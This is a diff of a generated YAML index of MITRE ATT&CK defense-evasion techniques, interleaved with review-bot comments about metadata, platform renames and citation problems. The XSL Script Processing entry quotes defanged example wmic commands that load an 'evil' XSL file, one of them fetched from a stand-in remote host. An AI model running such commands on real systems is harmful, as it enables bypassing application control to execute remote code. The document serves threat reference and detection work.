+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
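Review bot: the new TCC Manipulation description is emitted as a `|+` block scalar followed by a blank `+` line, so the value now ends with two newlines (`|+` keeps trailing newlines), whereas the old double-quoted form ended with a single `\n`. That trailing whitespace is harmless for YAML parsing but any consumer that renders or diffs descriptions will see it; stripping trailing whitespace before dumping would let the emitter use `|-` like the other descriptions. Separately, the new text reads `and an overwrites file (if connected to an MDM)`, which looks like a typo for 'overrides file'; since the text is ingested from upstream ATT&CK it should be reported there rather than patched locally.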
@@ -16841,6 +17129,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16848,7 +17138,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -16878,7 +17168,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -16924,7 +17213,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -16969,8 +17258,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -17015,7 +17302,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -17029,58 +17316,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
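Review bot: the ListPlanting description gains `(Citation: Hexacorn Listplanting)` and the matching `source_name: Hexacorn Listplanting` entry is added to `external_references` in the hunk that follows, so the citation stays resolvable; the rest of this hunk is key reordering (the external references deleted here are re-added, in a different order, in that later hunk). Note also that both the old and the new description lines break awkwardly around `SysListView32`, `FindWindow` and `EnumWindows`, which suggests the inline code markup around those identifiers has been lost at some stage; check the source bundle to confirm the generator is not stripping it.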
@@ -17097,6 +17354,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -17111,21 +17371,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -17170,9 +17461,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
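Review bot: T1484's `x_mitre_platforms` loses `Azure AD` and `SaaS` and gains `Identity Provider` (version '3.0' to '3.1'), which tracks ATT&CK's consolidation of identity platforms under the single 'Identity Provider' name. Any per-platform index derived from `x_mitre_platforms` will therefore stop listing T1484 under 'Azure AD' or 'SaaS'; check that every such index was regenerated in this same change and that nothing else in the repo filters on the removed platform strings.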
@@ -17229,8 +17519,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -17239,57 +17529,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
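Review bot: The `- spec_version: '2.1'` removal at the top of this hunk (the line just before `atomic_tests: []`) belongs to the previous technique object, and the same key is stripped from every technique in this diff while `x_mitre_attack_spec_version` is kept and bumped to `3.2.0`. STIX 2.1 requires `spec_version` on every object, so if the generator now deliberately omits it the commit message should say so and anything that validates the embedded objects as STIX needs checking; if it is a side effect of switching the source bundle, re-emit the key. The rest of the hunk is key reordering (platforms, domains, contributors and references are re-emitted further down the object), which makes the substantive changes hard to see; sorting keys deterministically in the generator would keep future diffs reviewable.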
@@ -17307,29 +17551,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
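Review bot: The re-emitted `Microsoft XSLT Script Mar 2017` reference still reads `XSLT Stylesheet Scripting Using .`, with the element name after "Using" missing, most likely angle-bracketed text dropped by an HTML sanitizer when the index was built; the URL slug `xslt-stylesheet-scripting-using-msxsl-script` suggests the lost token is the `<msxsl:script>` element. Since this hunk rewrites the whole `external_references` list, it is the place to escape the brackets or carry the title through unchanged from the STIX source rather than persist the truncated description again.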
@@ -17362,7 +17650,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
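Review bot: `modified` for T1564.001 goes backwards here, from `2021-04-29T14:49:39.188Z` to `2020-03-29T22:32:25.985Z`, and the same regression recurs later in the diff for T1480.001, T1216, T1556.004, T1574.004, T1601.002, T1127, T1218.014, T1564.010, T1574.012 and T1055.011. The old values all share the `.188Z` suffix (most are exactly `14:00:00.188Z`), which looks like a batch stamp applied at index-build time, while the new values look like the objects' own STIX `modified` times. That is probably the intended fix, but it changes what the field means, so the commit message should state it, and any consumer that sorts by `modified` or uses it to detect updated techniques needs re-checking.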
@@ -17390,8 +17678,6 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests:
- name: Create a hidden file in a hidden directory
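Review bot: This hunk drops `x_mitre_attack_spec_version: 2.1.0` for T1564.001 together with `spec_version`, and no replacement appears in the hunk, whereas for T1220 and T1578.001 the same key is removed in one place and re-emitted as `3.2.0` further down the object, and for T1480.001 it is kept as `2.1.0` context. T1556.004, T1601.002, T1564.010, T1574.012 and T1055.011 lose the key the same way. Confirm the generated T1564.001 object still carries `x_mitre_attack_spec_version`; if the source object genuinely lacks it, that difference deserves a line in the commit message so nobody reads it as a generator bug later.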
@@ -17412,42 +17698,7 @@ defense-evasion:
name: sh
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -17456,6 +17707,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -17464,20 +17718,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
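Review bot: `x_mitre_permissions_required: - User` is removed from T1578.001 in this hunk (alongside the bump to `x_mitre_version: '1.2'`) with nothing taking its place, while the same key is kept as context for T1564.001, T1556.004, T1601.002, T1564.010, T1055.011 and T1574.012 elsewhere in the diff, so the index now carries the field for some techniques and not others. If that mirrors the upstream object, fine, but a consumer that filters on `x_mitre_permissions_required` will silently skip this technique; the index docs should say the field is optional. Also note the `Mandiant M-Trends 2020` URL changes from `content.fireeye.com/m-trends/rpt-m-trends-2020` to `www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` while its retrieval date stays `April 24, 2020`, which is worth knowing when link checks run against this file.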
@@ -17534,6 +17819,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -17544,13 +17830,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
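Review bot: The platform list for T1550.001 replaces `Office 365`, `Google Workspace` and `Azure AD` with `Office Suite` and `Identity Provider`, and T1078.004 and T1556 get the same rewrite later in the diff. Any per-platform index, filter or matrix that keys on the old platform strings will stop matching these techniques after this change, so confirm the platform-to-index mapping in the generator and any downstream consumers are updated for the new names in the same change, and state in the commit message that this tracks the upstream platform consolidation rather than a local rename.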
@@ -17609,11 +17894,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -17653,8 +17937,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -17662,13 +17948,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -17699,9 +17985,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
@@ -17762,7 +18045,7 @@ defense-evasion:
